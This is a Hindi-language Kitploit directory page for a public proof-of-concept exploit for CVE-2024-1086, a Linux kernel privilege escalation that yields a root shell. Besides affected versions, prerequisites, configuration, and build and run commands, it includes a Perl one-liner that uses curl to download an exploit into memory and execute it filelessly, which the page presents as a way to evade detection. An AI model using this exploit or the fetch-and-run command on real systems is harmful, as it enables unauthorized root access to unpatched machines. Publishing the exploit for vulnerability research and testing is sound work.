Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/b1nhack/cve-2024-1086
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेपर और शोधलर्निंग और शिक्षाबाइनरी शोषण
GitHubb1nhack/cve-2024-1086

CVE-2024-1086

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-1086

यूनिवर्सल लोकल प्रिविलेज एस्केलेशन Proof-of-Concept एक्सप्लॉइट CVE-2024-1086 के लिए, जो v5.14 और v6.6 के बीच के अधिकांश Linux कर्नेल पर काम करता है, जिसमें Debian, Ubuntu और KernelCTF शामिल हैं। KernelCTF इमेजेज में सफलता दर 99.4% है।

https://github.com/Notselwyn/CVE-2024-1086/assets/68616630/a3d43951-94ab-4c09-a14b-07b81f89b3de

ब्लॉगपोस्ट / राइट-अप

एक्सप्लॉइट का पूरा राइट-अप - जिसमें पृष्ठभूमि जानकारी और ढेर सारे उपयोगी आरेख शामिल हैं - Flipping Pages ब्लॉगपोस्ट में पाया जा सकता है।

प्रभावित संस्करण

यह एक्सप्लॉइट v5.14 से (समावेशी) v6.6 तक (समावेशी) के संस्करणों को प्रभावित करता है, पैच की गई शाखाओं v5.15.149>, v6.1.76>, v6.6.15> को छोड़कर। इन संस्करणों के लिए पैच फरवरी 2024 में जारी किए गए थे। अंतर्निहित कमजोरी v3.15 से v6.8-rc1 तक के सभी संस्करणों (पैच की गई स्थिर शाखाओं को छोड़कर) को प्रभावित करती है।

चेतावनियाँ:

  • यह एक्सप्लॉइट v6.4> कर्नेल पर काम नहीं करता है जिनमें kconfig CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y हो (Ubuntu v6.5 सहित)।
  • एक्सप्लॉइट के लिए user namespaces (kconfig CONFIG_USER_NS=y) आवश्यक हैं, यह कि वे user namespaces अनप्रिविलेज्ड हों (sh कमांड sysctl kernel.unprivileged_userns_clone = 1), और यह कि nf_tables सक्षम हो (kconfig CONFIG_NF_TABLES=y)। डिफ़ॉल्ट रूप से, Debian, Ubuntu और KernelCTF पर ये सभी सक्षम होते हैं। अन्य डिस्ट्रो का परीक्षण नहीं किया गया है, लेकिन वे भी काम कर सकते हैं। इसके अतिरिक्त, एक्सप्लॉइट का परीक्षण केवल x64/amd64 पर किया गया है।
  • बहुत अधिक नेटवर्क गतिविधि वाले सिस्टम पर एक्सप्लॉइट अत्यधिक अस्थिर हो सकता है।
    • वाई-फाई एडॉप्टर वाले सिस्टम, जब उच्च-उपयोग वाले वाई-फाई नेटवर्क से घिरे होते हैं, बहुत अस्थिर होंगे।
    • परीक्षण उपकरणों पर, कृपया BIOS के माध्यम से वाई-फाई एडॉप्टर बंद कर दें।
  • एक्सप्लॉइट चलाने के बाद kernel panic (सिस्टम क्रैश) एक साइड-इफेक्ट है जिसे जानबूझकर ठीक नहीं किया गया है ताकि एक्सप्लॉइट के दुर्भावनापूर्ण उपयोग को रोका जा सके (यानी शोषण के प्रयास अब अधिक ध्यान देने योग्य होंगे, और वास्तविक दुनिया के ऑपरेशनों में अव्यावहारिक होंगे)। इसके बावजूद, यह प्रयोगशाला वातावरण में एक कार्यशील proof-of-concept की अनुमति देता है, क्योंकि रूट शेल कार्यात्मक है, और डिस्क के माध्यम से स्थिरता (persistence) संभव है।

उपयोग

कॉन्फ़िगरेशन

डिफ़ॉल्ट मान Debian, Ubuntu और KernelCTF पर लोकल शेल के साथ बिना किसी बदलाव के काम करने चाहिए। गैर-परीक्षित सेटअप/डिस्ट्रो पर, कृपया सुनिश्चित करें कि kconfig मान लक्षित कर्नेल से मेल खाते हों। इन्हें src/config.h में निर्दिष्ट किया जा सकता है। यदि आप 32GiB से अधिक फिजिकल मेमोरी वाली मशीन पर एक्सप्लॉइट चला रहे हैं, तो CONFIG_PHYS_MEM बढ़ाना सुनिश्चित करें। यदि आप SSH के माध्यम से (परीक्षण मशीन में) या रिवर्स शेल के माध्यम से एक्सप्लॉइट चला रहे हैं, तो आप अनावश्यक नेटवर्क गतिविधि से बचने के लिए CONFIG_REDIRECT_LOG को 1 पर टॉगल करना चाह सकते हैं।

बिल्डिंग

यदि यह आपके लिए अव्यावहारिक है, तो डिफ़ॉल्ट कॉन्फ़िगरेशन के साथ एक संकलित x64 बाइनरी उपलब्ध है।

root@kitploit:~
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make

बाइनरी: CVE-2024-1086/exploit

चलाना

एक्सप्लॉइट चलाना उतना ही आसान है:

root@kitploit:~
./exploit

फाइललेस निष्पादन भी समर्थित है, उन पेंटेस्ट स्थितियों के मामले में जहां डिटेक्शन से बचने की आवश्यकता होती है। हालाँकि, टारगेट पर Perl स्थापित होना आवश्यक है:

root@kitploit:~
perl -e '
  require qw/syscall.ph/;

  my $fd = syscall(SYS_memfd_create(), $fn, 0);
  system "curl https://example.com/exploit -s >&$fd";
  exec {"/proc/$$/fd/$fd"} "memfd";
'

अस्वीकरण

इस सॉफ्टवेयर निर्देशिका/फ़ोल्डर/रिपॉजिटरी ("रिपॉजिटरी") में मौजूद प्रोग्राम और स्क्रिप्ट ("प्रोग्राम") केवल शैक्षिक/अनुसंधान उद्देश्यों के लिए प्रकाशित, विकसित और वितरित किए जाते हैं। मैं ("निर्माता") इस रिपॉजिटरी में मौजूद प्रोग्रामों के किसी भी दुर्भावनापूर्ण या अवैध उपयोग का समर्थन नहीं करता/करती, क्योंकि इरादा अनुसंधान साझा करना है न कि इसके साथ अवैध गतिविधियाँ करना। इस रिपॉजिटरी में मौजूद प्रोग्रामों के साथ आप जो कुछ भी करते हैं, उसके लिए मैं कानूनी रूप से जिम्मेदार नहीं हूँ।

टूल डाउनलोड करें